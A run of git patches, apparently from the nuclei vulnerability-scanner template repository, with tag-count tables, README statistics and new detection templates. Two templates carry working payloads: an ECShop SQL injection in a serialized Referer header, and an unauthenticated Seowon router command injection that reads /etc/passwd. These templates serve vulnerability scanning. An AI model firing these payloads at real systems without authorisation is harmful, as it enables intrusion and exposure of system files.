+| openrestry | 1 | | | | | | | | | +| phpshowtime | 1 | | | | | | | | | +| instagram | 1 | | | | | | | | | +| key | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| taiga | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| cves2001 | 1 | | | | | | | | | +| calendly | 1 | | | | | | | | | +| cockpit | 1 | | | | | | | | | +| shoretel | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| primetek | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| csrfguard | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| mod-proxy | 1 | | | | | | | | | +| asana | 1 | | | | | | | | | +| eprints | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| catfishcms | 1 | | | | | | | | | +| gurock | 1 | | | | | | | | | +| onelogin | 1 | | | | | | | | | +| metabase | 1 | | | | | | | | | +| locations | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| tugboat | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| rsyncd | 1 | | | | | | | | | +| xampp | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| phpwiki | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| vercel | 1 | | | | | | | | | +| xmpp | 1 | | | | | | | | | +| details | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| iterable | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| scimono | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| natemail | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| codeigniter | 1 | | | | | | | | | +| beanstalk | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| circle | 1 | | | | | | | | | +| piluscart | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| tcexam | 1 | | | | | | | | | +| kindeditor | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| nsasg | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| zenario | 1 | | | | | | | | | +| terraform | 1 | | | | | | | | | +| shiro | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| ipstack | 1 | | | | | | | | | +| pentaho | 1 | | | | | | | | | +| vsphere | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| syslog | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| etouch | 1 | | | | | | | | | +| tinypng | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| playable | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| route | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| 74cms | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| autocomplete | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| omi | 1 | | | | | | | | | +| travis | 1 | | | | | | | | | +| loqate | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| smartblog | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| sterling | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| aniapi | 1 | | | | | | | | | +| dbt | 1 | | | | | | | | | +| particle | 1 | | | | | | | | | +| adafruit | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| maxsite | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| abuseipdb | 1 | | | | | | | | | +| jumpcloud | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| sugarcrm | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| webex | 1 | | | | | | | | | +| digitalocean | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| nifi | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| imap | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| nerdgraph | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| paypal | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| werkzeug | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| yzmcms | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| appveyor | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| burp | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| lokalise | 1 | | | | | | | | | +| openweather | 1 | | | | | | | | | +| tinymce | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| shoppable | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| umbraco | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| kodi | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| twitter | 1 | | | | | | | | | +| cloudflare | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| websphere | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| sendgrid | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| stripe | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| dnn | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | +| speed | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| matrix | 1 | | | | | | | | | +| eyelock | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| blackboard | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| placeos | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| testrail | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| nearby | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| square | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| ognl | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| alertmanager | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| roads | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| geolocation | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| cve202 | 1 | | | | | | | | | +| thedogapi | 1 | | | | | | | | | +| karel | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| raspap | 1 | | | | | | | | | +| tink | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| interlib | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| weglot | 1 | | | | | | | | | +| elevation | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| woocommerce | 1 | | | | | | | | | +| vnc | 1 | | | | | | | | | +| leanix | 1 | | | | | | | | | +| weather | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| api-manager | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| artica | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| gstorage | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| axiom | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| mpsec | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| mrtg | 1 | | | | | | | | | +| frontpage | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| optimizely | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| nexusdb | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| basic-auth | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| seeddms | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| remkon | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| wix | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| timezone | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| wakatime | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| limit | 1 | | | | | | | | | +| apigee | 1 | | | | | | | | | +| sast | 1 | | | | | | | | | +| gitea | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| circleci | 1 | | | | | | | | | +| hubspot | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| pivotaltracker | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| europeana | 1 | | | | | | | | | +| securityspy | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| motorola | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| pihole | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| geocode | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| newrelic | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | | listserv | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| netlify | 1 | | | | | | | | | +| covalent | 1 | | | | | | | | | +| photo | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| spf | 1 | | | | | | | | | +| olivetti | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| solarlog | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| dropbox | 1 | | | | | | | | | +| jaspersoft | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| dribbble | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| micro-user-service | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| glowroot | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| directions | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| graph | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| opensmtpd | 1 | | | | | | | | | +| adiscon | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| cliniccases | 1 | | | | | | | | | +| find | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| streetview | 1 | | | | | | | | | +| elfinder | 1 | | | | | | | | | +| nimble | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| cooperhewitt | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| oidc | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| gunicorn | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| deviantart | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| vanguard | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| place | 1 | | | | | | | | | +| flexbe | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| mapbox | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| rijksmuseum | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| skycaiji | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| cloudron | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| tor | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| spotify | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| jabber | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| cscart | 1 | | | | | | | | | +| dom | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| buttercms | 1 | | | | | | | | | +| nownodes | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| fontawesome | 1 | | | | | | | | | +| etherscan | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| daybyday | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| mailgun | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index dd5dbd59aa..89b4f69f41 100644 --- a/TOP-10.md +++ b/TOP-10.md @@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 859 | dhiyaneshdk | 315 | cves | 864 | info | 841 | http | 2345 | +| cve | 862 | dhiyaneshdk | 315 | cves | 867 | info | 840 | http | 2347 | | lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 | -| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 498 | network | 46 | -| xss | 268 | pdteam | 209 | technologies | 211 | critical | 305 | dns | 12 | +| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 500 | network | 46 | +| xss | 269 | pdteam | 210 | technologies | 211 | critical | 306 | dns | 12 | | wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | | -| exposure | 252 | dwisiswant0 | 152 | misconfiguration | 151 | | | | | +| exposure | 253 | dwisiswant0 | 152 | misconfiguration | 150 | | | | | | rce | 222 | gy741 | 85 | token-spray | 102 | | | | | | tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | | | wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | | -| cve2021 | 168 | madrobot | 65 | file | 57 | | | | | +| cve2021 | 169 | madrobot | 65 | file | 57 | | | | | From 3d567c158c428b948e8cb4ac3203b92500bdec73 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 6 Nov 2021 23:14:12 +0000 Subject: [PATCH 3480/4083] Auto README Update [Sat Nov 6 23:14:12 UTC 2021] :robot: --- README.md | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/README.md b/README.md index 3baca92138..14ebbd7e62 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 859 | dhiyaneshdk | 315 | cves | 864 | info | 841 | http | 2345 | +| cve | 862 | dhiyaneshdk | 315 | cves | 867 | info | 840 | http | 2347 | | lfi | 353 | daffainfo | 308 | vulnerabilities | 334 | high | 663 | file | 57 | -| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 498 | network | 46 | -| xss | 268 | pdteam | 209 | technologies | 211 | critical | 305 | dns | 12 | +| panel | 297 | pikpikcu | 281 | exposed-panels | 291 | medium | 500 | network | 46 | +| xss | 269 | pdteam | 210 | technologies | 211 | critical | 306 | dns | 12 | | wordpress | 263 | geeknik | 172 | exposures | 199 | low | 158 | | | -| exposure | 252 | dwisiswant0 | 152 | misconfiguration | 151 | | | | | +| exposure | 253 | dwisiswant0 | 152 | misconfiguration | 150 | | | | | | rce | 222 | gy741 | 85 | token-spray | 102 | | | | | | tech | 205 | pussycat0x | 77 | takeovers | 66 | | | | | | wp-plugin | 181 | princechaddha | 67 | default-logins | 61 | | | | | -| cve2021 | 168 | madrobot | 65 | file | 57 | | | | | +| cve2021 | 169 | madrobot | 65 | file | 57 | | | | | -**182 directories, 2529 files**. +**182 directories, 2531 files**. From f37527101cd67cd4032e103f0ad9ed37b52054f2 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Sun, 7 Nov 2021 02:03:09 +0000 Subject: [PATCH 3481/4083] Create ecshop-sql.yaml --- vulnerabilities/other/ecshop-sql.yaml | 29 +++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/other/ecshop-sql.yaml diff --git a/vulnerabilities/other/ecshop-sql.yaml b/vulnerabilities/other/ecshop-sql.yaml new file mode 100644 index 0000000000..d8f7000ac0 --- /dev/null +++ b/vulnerabilities/other/ecshop-sql.yaml @@ -0,0 +1,29 @@ +info: + name: Ecshop-SQL + author: Lark-lab,ImNightmaree + severity: medium + tages: sql,php,cms + +requests: + - raw: + - | + POST /user.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 + Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 + Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;} + Accept-Encoding: gzip, deflate + Accept-Language: en,zh-CN;q=0.9,zh;q=0.8 + + username=admin&password=123456&act=act_login + + matchers: + + - type: word + words: + - 'XPATH' + - 'MySQL' + - 'Array' + condition: and + From 38135df2a618d07c3a08313be3d3c16d0b3742db Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Sun, 7 Nov 2021 02:30:38 +0000 Subject: [PATCH 3482/4083] Update ecshop-sql.yaml --- vulnerabilities/other/ecshop-sql.yaml | 8 +++----- 1 file changed, 3 insertions(+), 5 deletions(-) diff --git a/vulnerabilities/other/ecshop-sql.yaml b/vulnerabilities/other/ecshop-sql.yaml index d8f7000ac0..fa829e0926 100644 --- a/vulnerabilities/other/ecshop-sql.yaml +++ b/vulnerabilities/other/ecshop-sql.yaml @@ -1,16 +1,15 @@ info: name: Ecshop-SQL author: Lark-lab,ImNightmaree - severity: medium + severity: critical tages: sql,php,cms -requests: +requests: - raw: - | POST /user.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:72:"0,1 procedure analyse(extractvalue(rand(),concat(0x7e,version())),1)-- -";s:2:"id";i:1;} Accept-Encoding: gzip, deflate @@ -25,5 +24,4 @@ requests: - 'XPATH' - 'MySQL' - 'Array' - condition: and - + condition: and From bbecf3965aafab6f40431af4919a4bc2463c9d2c Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Sun, 7 Nov 2021 02:36:28 +0000 Subject: [PATCH 3483/4083] Update ecshop-sql.yaml --- vulnerabilities/other/ecshop-sql.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/vulnerabilities/other/ecshop-sql.yaml b/vulnerabilities/other/ecshop-sql.yaml index fa829e0926..c60689b55e 100644 --- a/vulnerabilities/other/ecshop-sql.yaml +++ b/vulnerabilities/other/ecshop-sql.yaml @@ -6,7 +6,7 @@ info: requests: - raw: - - | + - | POST /user.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded @@ -21,7 +21,7 @@ requests: - type: word words: - - 'XPATH' - - 'MySQL' - - 'Array' - condition: and + - 'XPATH' + - 'MySQL' + - 'Array' + condition: and From b77df460dd6574f5669cab3aec11fc32a98cce36 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Sun, 7 Nov 2021 02:39:21 +0000 Subject: [PATCH 3484/4083] Linting --- vulnerabilities/other/ecshop-sql.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/ecshop-sql.yaml b/vulnerabilities/other/ecshop-sql.yaml index c60689b55e..8af0e13292 100644 --- a/vulnerabilities/other/ecshop-sql.yaml +++ b/vulnerabilities/other/ecshop-sql.yaml @@ -24,4 +24,4 @@ requests: - 'XPATH' - 'MySQL' - 'Array' - condition: and + condition: and From 797d9066a1828b8a3256085ed493e664a5b294a2 Mon Sep 17 00:00:00 2001 From: ImNightmaree Date: Sun, 7 Nov 2021 02:49:07 +0000 Subject: [PATCH 3485/4083] More linting --- vulnerabilities/other/ecshop-sql.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/ecshop-sql.yaml b/vulnerabilities/other/ecshop-sql.yaml index 8af0e13292..36f89c06e6 100644 --- a/vulnerabilities/other/ecshop-sql.yaml +++ b/vulnerabilities/other/ecshop-sql.yaml @@ -2,7 +2,7 @@ info: name: Ecshop-SQL author: Lark-lab,ImNightmaree severity: critical - tages: sql,php,cms + tags: sql,php,cms requests: - raw: From 6183e248d8ffb985edb4b071aa7bea81f74301d9 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 7 Nov 2021 14:39:06 +0900 Subject: [PATCH 3486/4083] Create seowon-router-rce.yaml Execute commands without authentication as admin user, To use it in all versions, we only enter the router ip & Port(if available) in the request The result of the request is visible on the browser page Signed-off-by: GwanYeong Kim --- vulnerabilities/other/seowon-router-rce.yaml | 35 ++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 vulnerabilities/other/seowon-router-rce.yaml diff --git a/vulnerabilities/other/seowon-router-rce.yaml b/vulnerabilities/other/seowon-router-rce.yaml new file mode 100644 index 0000000000..defdb8efb9 --- /dev/null +++ b/vulnerabilities/other/seowon-router-rce.yaml @@ -0,0 +1,35 @@ +id: seowon-router-rce + +info: + name: Seowon 130-SLC router - Remote Code Execution (Unauthenticated) + author: gy741 + severity: critical + reference: https://www.exploit-db.com/exploits/50295 + tags: rce,seowon + description: Execute commands without authentication as admin user, To use it in all versions, we only enter the router ip & Port(if available) in the request The result of the request is visible on the browser page + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Accept-Language: en-US,en;q=0.5 + Accept-Encoding: gzip, deflate + Content-Type: application/x-www-form-urlencoded + Referer: http://{{Hostname}}/diagnostic.html?t=201701020919 + Cookie: product=cpe; cpe_buildTime=201701020919; vendor=mobinnet; connType=lte; cpe_multiPdnEnable=1; cpe_lang=en; cpe_voip=0; cpe_cwmpc=1; cpe_snmp=1; filesharing=0; cpe_switchEnable=0; cpe_IPv6Enable=0; cpe_foc=0; cpe_vpn=1; cpe_httpsEnable=0; cpe_internetMTUEnable=0; cpe_opmode=lte; sessionTime=1631653385102; cpe_login=admin + Connection: keep-alive + + Command=Diagnostic&traceMode=trace&reportIpOnly=0&pingPktSize=56&pingTimeout=30&pingCount=4&ipAddr=&maxTTLCnt=30&queriesCnt=;cat /etc/passwd&reportIpOnlyCheckbox=on&btnApply=Apply&T=1631653402928 + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:.*:0:0" + part: body + + - type: status + status: + - 200 From d493444b06941f56b7e9ab7e5c01d4285be5ac94 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Nov 2021 12:13:48 +0530 Subject: [PATCH 3487/4083] Create pentaho-panel.yaml --- exposed-panels/pentaho-panel.yaml | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) create mode 100644 exposed-panels/pentaho-panel.yaml diff --git a/exposed-panels/pentaho-panel.yaml b/exposed-panels/pentaho-panel.yaml new file mode 100644 index 0000000000..abd5cde51c --- /dev/null +++ b/exposed-panels/pentaho-panel.yaml @@ -0,0 +1,17 @@ +id: pentaho-panel + +info: + name: Pentaho Panel + author: princechaddha + severity: info + tags: panel,pentaho + +requests: + - method: GET + path: + - '{{BaseURL}}/pentaho/Login' + + matchers: + - type: word + words: + - 'Pentaho User Console - Login' From 4a56cf94e44265fccc52af085edf5b0c45f8845d Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 8 Nov 2021 12:14:24 +0530 Subject: [PATCH 3488/4083] Update pentaho-panel.yaml --- exposed-panels/pentaho-panel.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/exposed-panels/pentaho-panel.yaml b/exposed-panels/pentaho-panel.yaml index abd5cde51c..cb4450b79f 100644 --- a/exposed-panels/pentaho-panel.yaml +++ b/exposed-panels/pentaho-panel.yaml @@ -4,6 +4,8 @@ 